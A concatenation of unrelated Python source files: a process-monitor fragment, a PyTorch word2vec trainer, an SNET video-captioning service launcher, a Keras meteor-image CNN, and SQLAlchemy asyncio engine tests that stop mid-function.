self.logging.error("Failed to retrieve child targets from select statement: %s" % msg)
#check for any dynamic processes that are no longer needed
# anything left in dynamic_procs_set is no longer in the database
for proc in dynamic_procs_set:
#join it
self.del_process(proc, dynamic=True)
for proc in procs_to_remove:
if proc in self.process_ids:
self.process_ids.pop(proc)
def _cleanup_event_pids(self, pid):
path = self.config.categories["ProcessMonitor"]["signal_registry"]
event_dirs = os.walk(path)
for epath in event_dirs:
pid_path = epath[0] + "/" + pid
if os.path.isfile(pid_path):
os.unlink(pid_path)
def terminate(signal_num, frame):
try:
logging.info("Recieved signal %s, removing pid file." % signal_num)
pid_file = frame.f_globals["PID_FILE"]
os.unlink(pid_file)
except Exception as exc:
logging.debug("Failed to unlink pid file:")
logging.debug(exc)
#Returns false if pid exists, true if pid is gone
def check_pid(pid_file):
if os.path.exists(pid_file):
#PID still exists, return false
return False
else:
return True
|
main2.py
|
#!/usr/bin/env python3
import argparse
from collections import Counter
from multiprocessing import set_start_method
import pdb
import re
import sys
import time
import numpy as np
import torch
import torch.nn as nn
from torch.autograd import Variable
from torch import optim
import torch.nn.functional as F
import torch.multiprocessing as mp
import data_producer
import dataloader
from utils import LookupTable
parser = argparse.ArgumentParser()
parser.add_argument("--train", type=str, default="", help="training file")
parser.add_argument("--output", type=str, default="vectors.txt", help="output word embedding file")
parser.add_argument("--size", type=int, default=300, help="word embedding dimension")
parser.add_argument("--cbow", type=int, default=1, help="1 for cbow, 0 for skipgram")
parser.add_argument("--window", type=int, default=5, help="context window size")
parser.add_argument("--sample", type=float, default=1e-4, help="subsample threshold")
parser.add_argument("--negative", type=int, default=10, help="number of negative samples")
parser.add_argument("--min_count", type=int, default=5, help="minimum frequency of a word")
parser.add_argument("--processes", type=int, default=4, help="number of processes")
parser.add_argument("--num_workers", type=int, default=6, help="number of workers for data processsing")
parser.add_argument("--iter", type=int, default=5, help="number of iterations")
parser.add_argument("--lr", type=float, default=-1.0, help="initial learning rate")
parser.add_argument("--batch_size", type=int, default=100, help="(max) batch size")
parser.add_argument("--cuda", action='store_true', default=False, help="enable cuda")
parser.add_argument("--output_ctx", action='store_true', default=False, help="output context embeddings")
MAX_SENT_LEN = 1000
# Build the vocabulary.
def file_split(f, delim=' \t\n', bufsize=1024):
prev = ''
while True:
s = f.read(bufsize)
if not s:
break
tokens = re.split('['+delim+']{1,}', s)
if len(tokens) > 1:
yield prev + tokens[0]
prev = tokens[-1]
for x in tokens[1:-1]:
yield x
else:
prev += s
if prev:
yield prev
def build_vocab(args):
vocab = Counter()
word_count = 0
for word in file_split(open(args.train)):
vocab[word] += 1
word_count += 1
if word_count % 10000 == 0:
sys.stdout.write('%d\r' % len(vocab))
freq = {k:v for k,v in vocab.items() if v >= args.min_count}
word_count = sum([freq[k] for k in freq])
word_list = sorted(freq, key=freq.get, reverse=True)
word2idx = {}
vocab_map = LookupTable()
idx_count = np.zeros((len(word_list),))
for i,w in enumerate(word_list):
vocab_map[w] = i
word2idx[w] = i
idx_count[i] = freq[w]
print("Vocab size: %ld" % len(word2idx))
print("Words in train file: %ld" % word_count)
vars(args)['vocab_size'] = len(word2idx)
vars(args)['train_words'] = word_count
padding_index = len(word2idx)
vocab_map.set_missing(padding_index)
#return word2idx, word_list, freq
return vocab_map, word_list, idx_count
class CBOWMean(torch.autograd.Function):
@staticmethod
def forward(ctx, x, lens):
ctx.save_for_backward(x)
x = torch.sum(x, 1, keepdim=True)
x = x.permute(1,2,0) / lens
return x.permute(2,0,1)
@staticmethod
def backward(ctx, g):
x, = ctx.saved_variables
return g.expand_as(x), None
class CBOW(nn.Module):
def __init__(self, args):
super(CBOW, self).__init__()
self.emb0_lookup = nn.Embedding(args.vocab_size+1, args.size, padding_idx=args.vocab_size, sparse=True)
self.emb1_lookup = nn.Embedding(args.vocab_size, args.size, sparse=True)
self.emb0_lookup.weight.data.uniform_(-0.5/args.size, 0.5/args.size)
self.emb0_lookup.weight.data[args.vocab_size].fill_(0)
self.emb1_lookup.weight.data.uniform_(-0.5/args.size, 0.5/args.size)
self.window = args.window
self.negative = args.negative
self.pad_idx = args.vocab_size
def forward(self, word_idx, ctx_inds, ctx_lens, neg_inds):
w_embs = self.emb1_lookup(word_idx)
c_embs = self.emb0_lookup(ctx_inds)
n_embs = self.emb1_lookup(neg_inds)
c_embs = CBOWMean.apply(c_embs, ctx_lens)
#c_embs = torch.mean(c_embs, 1, keepdim=True)
#c_embs = torch.sum(c_embs, 1, keepdim=True)
pos_ips = torch.sum(c_embs[:,0,:] * w_embs, 1)
neg_ips = torch.bmm(n_embs, c_embs.permute(0,2,1))[:,:,0]
# Neg Log Likelihood
pos_loss = torch.sum( -F.logsigmoid(torch.clamp(pos_ips,max=10,min=-10)) )
neg_loss = torch.sum( -F.logsigmoid(torch.clamp(-neg_ips,max=10,min=-10)) )
#neg_loss = torch.sum( -F.logsigmoid(torch.clamp(-neg_ips,max=10,min=-10)) * neg_mask )
return pos_loss + neg_loss
class SG(nn.Module):
def __init__(self, args):
super(SG, self).__init__()
self.emb0_lookup = nn.Embedding(args.vocab_size+1, args.size, padding_idx=args.vocab_size, sparse=True)
self.emb1_lookup = nn.Embedding(args.vocab_size, args.size, sparse=True)
self.emb0_lookup.weight.data.uniform_(-0.5/args.size, 0.5/args.size)
self.emb1_lookup.weight.data.zero_()
self.window = args.window
self.negative = args.negative
self.pad_idx = args.vocab_size
def forward(self, data):
word_idx = data[:, 0]
ctx_idx = data[:, 1]
neg_indices = data[:, 2:2+self.negative]
neg_mask = data[:, 2+self.negative:].float()
w_embs = self.emb0_lookup(word_idx)
c_embs = self.emb1_lookup(ctx_idx)
n_embs = self.emb1_lookup(neg_indices)
pos_ips = torch.sum(w_embs * c_embs, 1)
neg_ips = torch.bmm(n_embs, torch.unsqueeze(w_embs,1).permute(0,2,1))[:,:,0]
# Neg Log Likelihood
pos_loss = torch.sum( -F.logsigmoid(torch.clamp(pos_ips,max=10,min=-10)) )
neg_loss = torch.sum( -F.logsigmoid(torch.clamp(-neg_ips,max=10,min=-10)) * neg_mask )
return pos_loss + neg_loss
# Initialize model.
def init_net(args):
if args.cbow == 1:
if args.lr == -1.0:
vars(args)['lr'] = 0.05
return CBOW(args)
elif args.cbow == 0:
if args.lr == -1.0:
vars(args)['lr'] = 0.025
return SG(args)
# Training
def train_process(p_id, word_count_actual, vocab_map, idx_count, args, model):
dataset = dataloader.SentenceDataset(
"%s.%d" % (args.train, p_id),
vocab_map,
)
loader = dataloader.CBOWLoader(dataset, args.window, idx_count,
padding_index=len(idx_count),
sub_threshold=args.sample,
batch_size=args.batch_size,
num_workers=0)
optimizer = optim.SGD(model.parameters(), lr=args.lr)
#st = time.monotonic()
prev_cnt = 0
cnt = 0
for it in range(args.iter):
for batch in loader:
cnt += len(batch[0])
if cnt - prev_cnt > 10000:
with word_count_actual.get_lock():
word_count_actual.value += cnt - prev_cnt
delta = time.monotonic() - args.t_start
#print('\rtotal words: {0}, time spent: {1:.6f}, speed: {2:.6f}'.format(cnt, delta, cnt / delta) ,end='')
print('\rtotal words: {0}, time spent: {1:.6f}, speed: {2:.6f}'.format(word_count_actual.value, delta, word_count_actual.value / delta) ,end='')
prev_cnt = cnt
if args.cbow == 1:
word_idx = Variable(batch[0].cuda(), requires_grad=False)
ctx_inds = Variable(batch[1].cuda(), requires_grad=False)
ctx_lens = Variable(batch[2].cuda(), requires_grad=False)
neg_inds = Variable(batch[3].cuda(), requires_grad=False)
optimizer.zero_grad()
loss = model(word_idx, ctx_inds, ctx_lens, neg_inds)
loss.backward()
optimizer.step()
model.emb0_lookup.weight.data[args.vocab_size].fill_(0)
elif args.cbow == 0:
optimizer.zero_grad()
loss = model(batch)
loss.backward()
optimizer.step()
if __name__ == '__main__':
set_start_method('forkserver')
args = parser.parse_args()
print("Starting training using file %s" % args.train)
train_file = open(args.train)
train_file.seek(0, 2)
vars(args)['file_size'] = train_file.tell()
#word2idx, word_list, freq = build_vocab(args)
vocab_map, word_list, idx_count = build_vocab(args)
word_count_actual = mp.Value('L', 0)
model = init_net(args)
model.share_memory()
if args.cuda:
model.cuda()
vars(args)['t_start'] = time.monotonic()
processes = []
for p_id in range(args.processes):
p = mp.Process(target=train_process, args=(p_id, word_count_actual, vocab_map, idx_count, args, model))
p.start()
processes.append(p)
for p in processes:
p.join()
# output vectors
if args.cuda:
embs = model.emb0_lookup.weight.data.cpu().numpy()
else:
embs = model.emb0_lookup.weight.data.numpy()
data_producer.write_embs(args.output, word_list, embs, args.vocab_size, args.size)
print("")
print(time.monotonic() - args.t_start)
|
run_video_cap_service.py
|
import pathlib
import subprocess
import time
import os
import sys
import logging
import threading
from service import registry
logging.basicConfig(level=10, format="%(asctime)s - [%(levelname)8s] - %(name)s - %(message)s")
log = logging.getLogger("run_video_cap")
def main():
root_path = pathlib.Path(__file__).absolute().parent
# All services modules go here
service_modules = ["service.video_cap_service"]
# Removing all previous snetd .db file
os.system("rm snetd*.db")
# Call for all the services listed in service_modules
start_all_services(root_path, service_modules)
# Infinite loop to serve the services
while True:
try:
time.sleep(1)
except Exception as e:
log.error(e)
exit(0)
def start_all_services(cwd, service_modules):
"""
Loop through all service_modules and start them.
For each one, an instance of Daemon "snetd" is created.
snetd will start with configs from "snetd.config.json"
"""
try:
for i, service_module in enumerate(service_modules):
service_name = service_module.split(".")[-1]
log.info("Launching {} on port {}".format(str(registry[service_name]), service_module))
process_th = threading.Thread(target=start_service, args=(cwd, service_module))
# Bind the thread with the main() to abort it when main() exits.
process_th.daemon = True
process_th.start()
except Exception as e:
log.error(e)
return False
return True
def start_service(cwd, service_module):
"""
Starts SNET Daemon ("snetd") and the python module of the service
at the passed gRPC port.
"""
start_snetd(str(cwd))
service_name = service_module.split(".")[-1]
grpc_port = registry[service_name]["grpc"]
subprocess.Popen(
[sys.executable, "-m", service_module, "--grpc-port", str(grpc_port)],
cwd=str(cwd))
def start_snetd(cwd):
"""
Starts the Daemon "snetd":
"""
cmd = ["snetd", "serve"]
subprocess.Popen(cmd, cwd=str(cwd))
return True
if __name__ == "__main__":
main()
|
results_2_07_code.py
|
import tensorflow as tf
from tensorflow.keras.layers import Dense, Conv2D, MaxPooling2D, Dropout, Flatten
from tensorflow.keras.optimizers import Adam
from tensorflow.keras.preprocessing.image import ImageDataGenerator
from tensorflow.keras.callbacks import Callback
import numpy as np
import matplotlib.pyplot as plt
from os.path import join
from os import listdir
import multiprocessing
from performanceMeasure import getPerformanceMeasures, plotAccuracyAndLoss
def trainCNN( ):
tf.keras.backend.clear_session()
modelNumber = 'model_2_07'
base_dir = 'C:\work_dir\meteorData\extraData_70_30'
results_dir = join('G:\GIEyA\TFG\meteor_classification\\results_2', modelNumber)
results_dir_weights = join(results_dir, 'weights')
train_dir = join(base_dir, 'train')
validation_dir = join(base_dir, 'validation')
ImageResolution = (432, 432)
ImageResolutionGrayScale = (432, 432, 1)
# Training -> 62483 (3905x16)
# Validation -> 26780 (1673x16)
training_images = len(listdir(join(train_dir, 'meteors'))) + len(listdir(join(train_dir, 'non_meteors')))
validation_images = len(listdir(join(validation_dir, 'meteors'))) + len(listdir(join(validation_dir, 'non_meteors')))
batch_size = 20
steps_per_epoch = int(training_images / batch_size)
validation_steps = int(validation_images / batch_size)
#Rescale all images by 1./255
train_datagen = ImageDataGenerator(rescale=1.0/255)
validation_datagen = ImageDataGenerator(rescale=1.0/255.)
train_generator = train_datagen.flow_from_directory(train_dir,
batch_size=batch_size,
class_mode='binary',
color_mode='grayscale',
target_size=ImageResolution)
validation_generator = validation_datagen.flow_from_directory(validation_dir,
batch_size=batch_size,
class_mode='binary',
color_mode='grayscale',
target_size=ImageResolution)
# elu activation vs relu activation -> model_2_02 and model_2_03
# dropout evaluation: model_2_02 (dropout .3) vs model_2_06 (no dropout) vs model_2_07 (dropout .4):
model = tf.keras.models.Sequential([
Conv2D(16, (7, 7), activation='elu', input_shape=ImageResolutionGrayScale, strides=1),
Conv2D(16, (7, 7), activation='elu', input_shape=ImageResolutionGrayScale, strides=1),
MaxPooling2D(pool_size=(2, 2)),
Dropout(0.40),
Conv2D(12, (5, 5), activation='elu', kernel_initializer='he_uniform'),
Conv2D(24, (5, 5), activation='elu', kernel_initializer='he_uniform'),
Conv2D(12, (5, 5), activation='elu', kernel_initializer='he_uniform'),
MaxPooling2D(pool_size=(2, 2)),
Dropout(0.40),
Conv2D(12, (5, 5), activation='elu', kernel_initializer='he_uniform'),
Conv2D(24, (5, 5), activation='elu', kernel_initializer='he_uniform'),
Conv2D(12, (5, 5), activation='elu', kernel_initializer='he_uniform'),
MaxPooling2D(pool_size=(2, 2)),
Dropout(0.40),
Conv2D(16, (3, 3), activation='elu', kernel_initializer='he_uniform'),
Conv2D(24, (3, 3), activation='elu', kernel_initializer='he_uniform'),
Conv2D(16, (3, 3), activation='elu', kernel_initializer='he_uniform'),
MaxPooling2D(pool_size=(2, 2)),
Dropout(0.40),
Conv2D(24, (3, 3), activation='elu', kernel_initializer='he_uniform'),
Conv2D(32, (3, 3), activation='elu', kernel_initializer='he_uniform'),
Conv2D(24, (3, 3), activation='elu', kernel_initializer='he_uniform'),
MaxPooling2D(pool_size=(2, 2)),
Dropout(0.40),
Flatten(),
Dense(864, activation='elu', kernel_initializer='he_uniform'),
Dropout(0.40),
Dense(16, activation='elu', kernel_initializer='he_uniform'),
Dropout(0.30),
Dense(1, activation='sigmoid', kernel_initializer='he_uniform')
])
print(model.summary())
optimizer = Adam(learning_rate=5e-4)
model.compile(optimizer=optimizer,
loss='binary_crossentropy',
metrics=['accuracy'])
class SaveModelCallback(Callback):
def __init__(self, thresholdTrain, thresholdValid):
super(SaveModelCallback, self).__init__()
self.thresholdTrain = thresholdTrain
self.thresholdValid = thresholdValid
def on_epoch_end(self, epoch, logs=None):
if((logs.get('accuracy') >= self.thresholdTrain) and (logs.get('val_accuracy') >= self.thresholdValid)):
model.save_weights(join(results_dir_weights, modelNumber + '_acc_' + str(logs.get('accuracy'))[0:5]
+ '_val_acc_' + str(logs.get('val_accuracy'))[0:5] + '.h5'), save_format='h5')
callback_84_84 = SaveModelCallback(0.840, 0.840)
history = model.fit(train_generator,
validation_data=validation_generator,
steps_per_epoch=steps_per_epoch,
epochs=15, #Later train with more epochs if neccessary
validation_steps=validation_steps,
shuffle=True,
verbose=1,
callbacks=[callback_84_84])
################################# PRINT MODEL PERFORMANCE AND GET PERFORMANCE MEASURES #################################
# Get performance measures:
getPerformanceMeasures(model, validation_dir, ImageResolution, join(results_dir, 'performance_' + modelNumber + '.txt'), threshold=0.50)
# Plot Accuracy and Loss in both train and validation sets
plotAccuracyAndLoss(history)
#########################################################################################################################
if __name__ == '__main__':
p = multiprocessing.Process(target=trainCNN)
p.start()
p.join()
|
test_engine_py3k.py
|
import asyncio
import inspect as stdlib_inspect
from sqlalchemy import Column
from sqlalchemy import create_engine
from sqlalchemy import delete
from sqlalchemy import event
from sqlalchemy import exc
from sqlalchemy import func
from sqlalchemy import inspect
from sqlalchemy import Integer
from sqlalchemy import select
from sqlalchemy import String
from sqlalchemy import Table
from sqlalchemy import testing
from sqlalchemy import text
from sqlalchemy import union_all
from sqlalchemy.ext.asyncio import async_engine_from_config
from sqlalchemy.ext.asyncio import create_async_engine
from sqlalchemy.ext.asyncio import engine as _async_engine
from sqlalchemy.ext.asyncio import exc as async_exc
from sqlalchemy.ext.asyncio import exc as asyncio_exc
from sqlalchemy.ext.asyncio.base import ReversibleProxy
from sqlalchemy.ext.asyncio.engine import AsyncConnection
from sqlalchemy.ext.asyncio.engine import AsyncEngine
from sqlalchemy.pool import AsyncAdaptedQueuePool
from sqlalchemy.testing import assertions
from sqlalchemy.testing import async_test
from sqlalchemy.testing import combinations
from sqlalchemy.testing import config
from sqlalchemy.testing import engines
from sqlalchemy.testing import eq_
from sqlalchemy.testing import expect_raises
from sqlalchemy.testing import expect_raises_message
from sqlalchemy.testing import fixtures
from sqlalchemy.testing import is_
from sqlalchemy.testing import is_false
from sqlalchemy.testing import is_none
from sqlalchemy.testing import is_not
from sqlalchemy.testing import is_true
from sqlalchemy.testing import mock
from sqlalchemy.testing import ne_
from sqlalchemy.util.concurrency import greenlet_spawn
class AsyncFixture:
@config.fixture(
params=[
(rollback, run_second_execute, begin_nested)
for rollback in (True, False)
for run_second_execute in (True, False)
for begin_nested in (True, False)
]
)
def async_trans_ctx_manager_fixture(self, request, metadata):
rollback, run_second_execute, begin_nested = request.param
from sqlalchemy import Table, Column, Integer, func, select
t = Table("test", metadata, Column("data", Integer))
eng = getattr(self, "bind", None) or config.db
t.create(eng)
async def run_test(subject, trans_on_subject, execute_on_subject):
async with subject.begin() as trans:
if begin_nested:
if not config.requirements.savepoints.enabled:
config.skip_test("savepoints not enabled")
if execute_on_subject:
nested_trans = subject.begin_nested()
else:
nested_trans = trans.begin_nested()
async with nested_trans:
if execute_on_subject:
await subject.execute(t.insert(), {"data": 10})
else:
await trans.execute(t.insert(), {"data": 10})
# for nested trans, we always commit/rollback on the
# "nested trans" object itself.
# only Session(future=False) will affect savepoint
# transaction for session.commit/rollback
if rollback:
await nested_trans.rollback()
else:
await nested_trans.commit()
if run_second_execute:
with assertions.expect_raises_message(
exc.InvalidRequestError,
"Can't operate on closed transaction "
"inside context manager. Please complete the "
"context manager "
"before emitting further commands.",
):
if execute_on_subject:
await subject.execute(
t.insert(), {"data": 12}
)
else:
await trans.execute(
t.insert(), {"data": 12}
)
# outside the nested trans block, but still inside the
# transaction block, we can run SQL, and it will be
# committed
if execute_on_subject:
await subject.execute(t.insert(), {"data": 14})
else:
await trans.execute(t.insert(), {"data": 14})
else:
if execute_on_subject:
await subject.execute(t.insert(), {"data": 10})
else:
await trans.execute(t.insert(), {"data": 10})
if trans_on_subject:
if rollback:
await subject.rollback()
else:
await subject.commit()
else:
if rollback:
await trans.rollback()
else:
await trans.commit()
if run_second_execute:
with assertions.expect_raises_message(
exc.InvalidRequestError,
"Can't operate on closed transaction inside "
"context "
"manager. Please complete the context manager "
"before emitting further commands.",
):
if execute_on_subject:
await subject.execute(t.insert(), {"data": 12})
else:
await trans.execute(t.insert(), {"data": 12})
expected_committed = 0
if begin_nested:
# begin_nested variant, we inserted a row after the nested
# block
expected_committed += 1
if not rollback:
# not rollback variant, our row inserted in the target
# block itself would be committed
expected_committed += 1
if execute_on_subject:
eq_(
await subject.scalar(select(func.count()).select_from(t)),
expected_committed,
)
else:
with subject.connect() as conn:
eq_(
await conn.scalar(select(func.count()).select_from(t)),
expected_committed,
)
return run_test
class EngineFixture(AsyncFixture, fixtures.TablesTest):
__requires__ = ("async_dialect",)
@testing.fixture
def async_engine(self):
return engines.testing_engine(asyncio=True, transfer_staticpool=True)
@testing.fixture
def async_connection(self, async_engine):
with async_engine.sync_engine.connect() as conn:
yield AsyncConnection(async_engine, conn)
@classmethod
def define_tables(cls, metadata):
Table(
"users",
metadata,
Column("user_id", Integer, primary_key=True, autoincrement=False),
Column("user_name", String(20)),
)
@classmethod
def insert_data(cls, connection):
users = cls.tables.users
connection.execute(
users.insert(),
[{"user_id": i, "user_name": "name%d" % i} for i in range(1, 20)],
)
class AsyncEngineTest(EngineFixture):
__backend__ = True
@testing.fails("the failure is the test")
@async_test
async def test_we_are_definitely_running_async_tests(self, async_engine):
async with async_engine.connect() as conn:
eq_(await conn.scalar(text("select 1")), 2)
@async_test
async def test_interrupt_ctxmanager_connection(
self, async_engine, async_trans_ctx_manager_fixture
):
fn = async_trans_ctx_manager_fixture
async with async_engine.connect() as conn:
await fn(conn, trans_on_subject=False, execute_on_subject=True)
def test_proxied_attrs_engine(self, async_engine):
sync_engine = async_engine.sync_engine
is_(async_engine.url, sync_engine.url)
is_(async_engine.pool, sync_engine.pool)
is_(async_engine.dialect, sync_engine.dialect)
eq_(async_engine.name, sync_engine.name)
eq_(async_engine.driver, sync_engine.driver)
eq_(async_engine.echo, sync_engine.echo)
@async_test
async def test_run_async(self, async_engine):
async def test_meth(async_driver_connection):
# there's no method that's guaranteed to be on every
# driver, so just stringify it and compare that to the
# outside
return str(async_driver_connection)
def run_sync_to_async(connection):
connection_fairy = connection.connection
async_return = connection_fairy.run_async(
lambda driver_connection: test_meth(driver_connection)
)
assert not stdlib_inspect.iscoroutine(async_return)
return async_return
async with async_engine.connect() as conn:
driver_connection = (
await conn.get_raw_connection()
).driver_connection
res = await conn.run_sync(run_sync_to_async)
assert not stdlib_inspect.iscoroutine(res)
eq_(res, str(driver_connection))
@async_test
async def test_engine_eq_ne(self, async_engine):
e2 = _async_engine.AsyncEngine(async_engine.sync_engine)
e3 = engines.testing_engine(asyncio=True, transfer_staticpool=True)
eq_(async_engine, e2)
ne_(async_engine, e3)
is_false(async_engine == None)
@async_test
async def test_no_attach_to_event_loop(self, testing_engine):
"""test #6409"""
import asyncio
import threading
errs = []
def go():
loop = asyncio.new_event_loop()
asyncio.set_event_loop(loop)
async def main():
tasks = [task() for _ in range(2)]
await asyncio.gather(*tasks)
await engine.dispose()
async def task():
async with engine.begin() as connection:
result = await connection.execute(select(1))
result.all()
try:
engine = engines.testing_engine(
asyncio=True, transfer_staticpool=False
)
asyncio.run(main())
except Exception as err:
errs.append(err)
t = threading.Thread(target=go)
t.start()
t.join()
if errs:
raise errs[0]
@async_test
async def test_connection_info(self, async_engine):
async with async_engine.connect() as conn:
conn.info["foo"] = "bar"
eq_(conn.sync_connection.info, {"foo": "bar"})
@async_test
async def test_connection_eq_ne(self, async_engine):
async with async_engine.connect() as conn:
c2 = _async_engine.AsyncConnection(
async_engine, conn.sync_connection
)
eq_(conn, c2)
async with async_engine.connect() as c3:
ne_(conn, c3)
is_false(conn == None)
@async_test
async def test_transaction_eq_ne(self, async_engine):
async with async_engine.connect() as conn:
t1 = await conn.begin()
t2 = _async_engine.AsyncTransaction._regenerate_proxy_for_target(
t1._proxied
)
eq_(t1, t2)
is_false(t1 == None)
def test_clear_compiled_cache(self, async_engine):
async_engine.sync_engine._compiled_cache["foo"] = "bar"
eq_(async_engine.sync_engine._compiled_cache["foo"], "bar")
async_engine.clear_compiled_cache()
assert "foo" not in async_engine.sync_engine._compiled_cache
def test_execution_options(self, async_engine):
a2 = async_engine.execution_options(foo="bar")
assert isinstance(a2, _async_engine.AsyncEngine)
eq_(a2.sync_engine._execution_options, {"foo": "bar"})
eq_(async_engine.sync_engine._execution_options, {})
"""
attr uri, pool, dialect, engine, name, driver, echo
methods clear_compiled_cache, update_execution_options,
execution_options, get_execution_options, dispose
"""
@async_test
async def test_proxied_attrs_connection(self, async_engine):
async with async_engine.connect() as conn:
sync_conn = conn.sync_connection
is_(conn.engine, async_engine)
is_(conn.closed, sync_conn.closed)
is_(conn.dialect, async_engine.sync_engine.dialect)
eq_(
conn.default_isolation_level, sync_conn.default_isolation_level
)
@async_test
async def test_transaction_accessor(self, async_connection):
conn = async_connection
is_none(conn.get_transaction())
is_false(conn.in_transaction())
is_false(conn.in_nested_transaction())
trans = await conn.begin()
is_true(conn.in_transaction())
is_false(conn.in_nested_transaction())
is_(trans.sync_transaction, conn.get_transaction().sync_transaction)
nested = await conn.begin_nested()
is_true(conn.in_transaction())
is_true(conn.in_nested_transaction())
is_(
conn.get_nested_transaction().sync_transaction,
nested.sync_transaction,
)
eq_(conn.get_nested_transaction(), nested)
is_(trans.sync_transaction, conn.get_transaction().sync_transaction)
await nested.commit()
is_true(conn.in_transaction())
is_false(conn.in_nested_transaction())
await trans.rollback()
is_none(conn.get_transaction())
is_false(conn.in_transaction())
is_false(conn.in_nested_transaction())
@testing.requires.queue_pool
@async_test
async def test_invalidate(self, async_engine):
conn = await async_engine.connect()
is_(conn.invalidated, False)
connection_fairy = await conn.get_raw_connection()
is_(connection_fairy.is_valid, True)
dbapi_connection = connection_fairy.dbapi_connection
await conn.invalidate()
if testing.against("postgresql+asyncpg"):
assert dbapi_connection._connection.is_closed()
new_fairy = await conn.get_raw_connection()
is_not(new_fairy.dbapi_connection, dbapi_connection)
is_not(new_fairy, connection_fairy)
is_(new_fairy.is_valid, True)
is_(connection_fairy.is_valid, False)
await conn.close()
@async_test
async def test_get_dbapi_connection_raise(self, async_connection):
with testing.expect_raises_message(
exc.InvalidRequestError,
"AsyncConnection.connection accessor is not "
"implemented as the attribute",
):
async_connection.connection
@async_test
async def test_get_raw_connection(self, async_connection):
pooled = await async_connection.get_raw_connection()
is_(pooled, async_connection.sync_connection.connection)
@async_test
async def test_isolation_level(self, async_connection):
conn = async_connection
sync_isolation_level = await greenlet_spawn(
conn.sync_connection.get_isolation_level
)
isolation_level = await conn.get_isolation_level()
eq_(isolation_level, sync_isolation_level)
await conn.execution_options(isolation_level="SERIALIZABLE")
isolation_level = await conn.get_isolation_level()
eq_(isolation_level, "SERIALIZABLE")
@testing.requires.queue_pool
@async_test
async def test_dispose(self, async_engine):
c1 = await async_engine.connect()
c2 = await async_engine.connect()
await c1.close()
await c2.close()
p1 = async_engine.pool
if isinstance(p1, AsyncAdaptedQueuePool):
eq_(async_engine.pool.checkedin(), 2)
await async_engine.dispose()
if isinstance(p1, AsyncAdaptedQueuePool):
eq_(async_engine.pool.checkedin(), 0)
is_not(p1, async_engine.pool)
@testing.requires.queue_pool
@async_test
async def test_dispose_no_close(self, async_engine):
c1 = await async_engine.connect()
c2 = await async_engine.connect()
await c1.close()
await c2.close()
p1 = async_engine.pool
if isinstance(p1, AsyncAdaptedQueuePool):
eq_(async_engine.pool.checkedin(), 2)
await async_engine.dispose(close=False)
# TODO: test that DBAPI connection was not closed
if isinstance(p1, AsyncAdaptedQueuePool):
eq_(async_engine.pool.checkedin(), 0)
is_not(p1, async_engine.pool)
@testing.requires.independent_connections
@async_test
async def test_init_once_concurrency(self, async_engine):
async with async_engine.connect() as c1, async_engine.connect() as c2:
await asyncio.wait([c1, c2])
@async_test
async def test_connect_ctxmanager(self, async_engine):
async with async_engine.connect() as conn:
result = await conn.execute(select(1))
eq_(result.scalar(), 1)
@async_test
async def test_connect_plain(self, async_engine):
conn = await async_engine.connect()
try:
result = await conn.execute(select(1))
eq_(result.scalar(), 1)
finally:
await conn.close()
@async_test
async def test_connection_not_started(self, async_engine):
conn = async_engine.connect()
testing.assert_raises_message(
asyncio_exc.AsyncContextNotStarted,
"AsyncConnection context has not been started and "
"object has not been awaited.",
conn.begin,
)
@async_test
async def test_transaction_commit(self, async_engine):
users = self.tables.users
async with async_engine.begin() as conn:
await conn.execute(delete(users))
async with async_engine.connect() as conn:
eq_(await conn.scalar(select(func.count(users.c.user_id))), 0)
@async_test
async def test_savepoint_rollback_noctx(self, async_engine):
users = self.tables.users
async with async_engine.begin() as conn:
savepoint = await conn.begin_nested()
await conn.execute(delete(users))
await savepoint.rollback()
async with async_engine.connect() as conn:
eq_(await conn.scalar(select(func.count(users.c.user_id))), 19)
@async_test
async def test_savepoint_commit_noctx(self, async_engine):
users = self.tables.users
async with async_engine.begin() as conn:
savepoint = await conn.begin_nested()
await conn.execute(delete(users))
await savepoint.commit()
async with async_engine.connect() as conn:
eq_(await conn.scalar(select(func.count(users.c.user_id))), 0)
@async_test
async def test_transaction_rollback(self, async_engine):
users = self.tables.users
async with async_engine.connect() as conn:
trans = conn.begin()
await trans.start()
await conn.execute(delete(users))
await trans.rollback()
async with async_engine.connect() as conn:
eq_(await conn.scalar(select(func.count(users.c.user_id))), 19)
@async_test
async def test_conn_transaction_not_started(self, async_engine):
async with async_engine.connect() as conn:
trans = conn.begin()
with expect_raises_message(
asyncio_exc.AsyncContextNotStarted,
"AsyncTransaction context has not been started "
"and object has not been awaited.",
):
await trans.rollback(),
@testing.requires.queue_pool
@async_test
async def test_pool_exhausted_some_timeout(self, async_engine):
engine = create_async_engine(
testing.db.url,
pool_size=1,
max_overflow=0,
pool_timeout=0.1,
)
async with engine.connect():
with expect_raises(exc.TimeoutError):
await engine.connect()
@testing.requires.queue_pool
@async_test
async def test_pool_exhausted_no_timeout(self, async_engine):
engine = create_async_engine(
testing.db.url,
pool_size=1,
max_overflow=0,
pool_timeout=0,
)
async with engine.connect():
with expect_raises(exc.TimeoutError):
await engine.connect()
@async_test
async def test_create_async_engine_server_side_cursor(self, async_engine):
testing.assert_raises_message(
asyncio_exc.AsyncMethodRequired,
"Can't set server_side_cursors for async engine globally",
create_async_engine,
testing.db.url,
server_side_cursors=True,
)
def test_async_engine_from_config(self):
config = {
"sqlalchemy.url": str(testing.db.url),
"sqlalchemy.echo": "true",
}
engine = async_engine_from_config(config)
assert engine.url == testing.db.url
assert engine.echo is True
assert engine.dialect.is_async is True
class AsyncEventTest(EngineFixture):
"""The engine events all run in their normal synchronous context.
we do not provide an asyncio event interface at this time.
"""
__backend__ = True
@async_test
async def test_no_async_listeners(self, async_engine):
with testing.expect_raises_message(
NotImplementedError,
"asynchronous events are not implemented "
"at this time. Apply synchronous listeners to the "
"AsyncEngine.sync_engine or "
"AsyncConnection.sync_connection attributes.",
):
event.listen(async_engine, "before_cursor_execute", mock.Mock())
async with async_engine.connect() as conn:
with testing.expect_raises_message(
NotImplementedError,
"asynchronous events are not implemented "
"at this time. Apply synchronous listeners to the "
"AsyncEngine.sync_engine or "
"AsyncConnection.sync_connection attributes.",
):
event.listen(conn, "before_cursor_execute", mock.Mock())
@async_test
async def test_no_async_listeners_dialect_event(self, async_engine):
with testing.expect_raises_message(
NotImplementedError,
"asynchronous events are not implemented "
"at this time. Apply synchronous listeners to the "
"AsyncEngine.sync_engine or "
"AsyncConnection.sync_connection attributes.",
):
event.listen(async_engine, "do_execute", mock.Mock())
@async_test
async def test_no_async_listeners_pool_event(self, async_engine):
with testing.expect_raises_message(
NotImplementedError,
"asynchronous events are not implemented "
"at this time. Apply synchronous listeners to the "
"AsyncEngine.sync_engine or "
"AsyncConnection.sync_connection attributes.",
):
